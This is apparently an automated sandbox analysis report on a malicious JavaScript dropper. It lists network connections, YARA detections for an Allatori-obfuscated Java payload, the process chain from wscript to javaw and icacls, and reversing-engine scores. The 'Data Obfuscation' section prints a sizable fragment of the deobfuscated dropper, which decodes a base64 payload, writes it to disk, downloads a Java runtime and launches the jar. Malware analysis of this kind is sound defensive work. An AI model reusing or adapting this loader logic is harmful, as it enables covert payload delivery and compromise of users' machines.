Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50090 version: TLS 1.2

System Summary

Source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 8NR95Z54o9.js Initial sample: Suspicious string .write LNDYAXRL
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: 8NR95Z54o9.js Initial sample: Strings found which are bigger than 50
Source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@5/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\qkviumto.txt
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 8NR95Z54o9.js ReversingLabs: Detection: 42%
Source: 8NR95Z54o9.js Virustotal: Detection: 53%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8NR95Z54o9.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript[vCFcYOq[47]](vCFcYOq[4]);var TZmcwL_oCK = EhujXBtwg_[vCFcYOq[48]](vCFcYOq[5]);var $vwoTow_rZ = EhujXBtwg_[vCFcYOq[48]](vCFcYOq[6]);var r = Math[vCFcYOq[50]]()[vCFcYOq[51]](36)[vCFcYOq[46]](/[^a-z]+/g, '')[vCFcYOq[53]](0, 10);var cJnqLRcRyb = $vwoTow_rZ + vCFcYOq[7] + r + vCFcYOq[8]var lE_WwLtDWo = decodeBase64(LHFsaavDEm);writeBytes(cJnqLRcRyb, lE_WwLtDWo);var NgbTLjJfnH = WScript[vCFcYOq[47]](vCFcYOq[9]);var eiehQ$KWpE = "";try{eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[10]);eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[11] + eiehQ$KWpE + vCFcYOq[12]);}catch(err){}try{if(eiehQ$KWpE == ""){eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[13]);eiehQ$KWpE = EhujXBtwg_[vCFcYOq[55]](vCFcYOq[14] + eiehQ$KWpE + vCFcYOq[12]);if(eiehQ$KWpE != ""){eiehQ$KWpE = eiehQ$KWpE + vCFcYOq[16];}}else{eiehQ$KWpE = eiehQ$KWpE + vCFcYOq[16];}}catch(err){}try{if(eiehQ$KWpE != ""){EhujXBtwg_[vCFcYOq[59]](vCFcYOq[18] + eiehQ$KWpE + vCFcYOq[19] + cJnqLRcRyb + vCFcYOq[18]);} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var IuRBzWDASj = WScript[vCFcYOq[47]](vCFcYOq[21]);var USpdlVIuFC = WScript[vCFcYOq[47]](vCFcYOq[22]);IuRBzWDASj[vCFcYOq[62]](vCFcYOq[23], vCFcYOq[24], false);IuRBzWDASj[vCFcYOq[63]](2, 13056);IuRBzWDASj[vCFcYOq[64]]();USpdlVIuFC[vCFcYOq[65]] = 1;USpdlVIuFC[vCFcYOq[62]]();USpdlVIuFC.write(IuRBzWDASj[vCFcYOq[67]]);USpdlVIuFC[vCFcYOq[68]]($vwoTow_rZ + vCFcYOq[25], 2);break;}catch(err){WScript[vCFcYOq[69]](5000);}}while(true);UnZip($vwoTow_rZ + vCFcYOq[25], $vwoTow_rZ + vCFcYOq[27]);EhujXBtwg_[vCFcYOq[70]](vCFcYOq[28], vCFcYOq[18] + $vwoTow_rZ + vCFcYOq[30] + vCFcYOq[18] + cJnqLRcRyb + vCFcYOq[18], vCFcYOq[33]);EhujXBtwg_[vCFcYOq[59]](vCFcYOq[18] + $vwoTow_rZ + vCFcYOq[30] + vCFcYOq[18] + cJnqLRcRyb + vCFcYOq[18]);}function decodeBase64(base64){var DM = WScript[vCFcYOq[47]](vCFcYOq[38]);var EL = DM[vCFcYOq[73]](vCFcYOq[39]);EL[vCFcYOq[74]] = vCFcYOq[40];EL[vCFcYOq[75]] = 
base64;return EL[vCFcYOq[76]];}function writeBytes(file, bytes){var iXCQWeALg_ = WScript[vCFcYOq[47]](vCFcYOq[41]);iXCQWeALg_[vCFcYOq[65]] = 1;iXCQWeALg_[vCFcYOq[79]]();iXCQWeALg_[vCFcYOq[80]](bytes);iXCQWeALg_[vCFcYOq[81]](file, 2);}function UnZip(zipfile, ExtractTo){if(NgbTLjJfnH[vCFcYOq[82]](zipfile) == vCFcYOq[42]){if(!NgbTLjJfnH[vCFcYOq[83]](ExtractTo)){NgbTLjJfnH[vCFcYOq[84]](ExtractTo);}var axmrFsozuO = WScript[vCFcYOq[47]](vCFcYOq[43]);var EjlgNlRbUT = axmrFsozuO[vCFcYOq[86]](ExtractTo);var $ppNxKRaDu = axmrFsozuO[vCFcYOq[86]](zipfile)[vCFcYOq[88]]();for(i = 0; i < $ppNxKRaDu[vCFcYOq[89]]; i++){if(NgbTLjJfnH[vCFcYOq[90]](NgbTLjJfnH[vCFcYOq[91]](ExtractTo,$ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[93]])+vCFcYOq[44]+NgbTLjJfnH[vCFcYOq[94]]($ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[96]]))){NgbTLjJfnH[vCFcYOq[97]](NgbTLjJfnH[vCFcYOq[91]](ExtractTo,$ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[93]])+vCFcYOq[44]+NgbTLjJfnH[vCFcYOq[94]]($ppNxKRaDu[vCFcYOq[92]](i)[vCFcYOq[96]]));}EjlgNlRbUT[vCFcYOq[104]]($ppNxKRaDu[vCFcYOq[92]](i), 20);}}}ITextStream.WriteLine(" exec:111 f:");ITextStream.
Source: Yara match File source: 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021F23EC push es; retn 0001h 1_2_021F24FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021F246F push es; retn 0001h 1_2_021F24FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021E9091 push cs; retf 1_2_021E90B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214D8F7 push 00000000h; mov dword ptr [esp], esp 1_2_0214D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214A21B push ecx; ret 1_2_0214A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214A20A push ecx; ret 1_2_0214A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214BB67 push 00000000h; mov dword ptr [esp], esp 1_2_0214BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214B3B7 push 00000000h; mov dword ptr [esp], esp 1_2_0214B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214D8E0 push 00000000h; mov dword ptr [esp], esp 1_2_0214D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214B947 push 00000000h; mov dword ptr [esp], esp 1_2_0214B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214C477 push 00000000h; mov dword ptr [esp], esp 1_2_0214C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
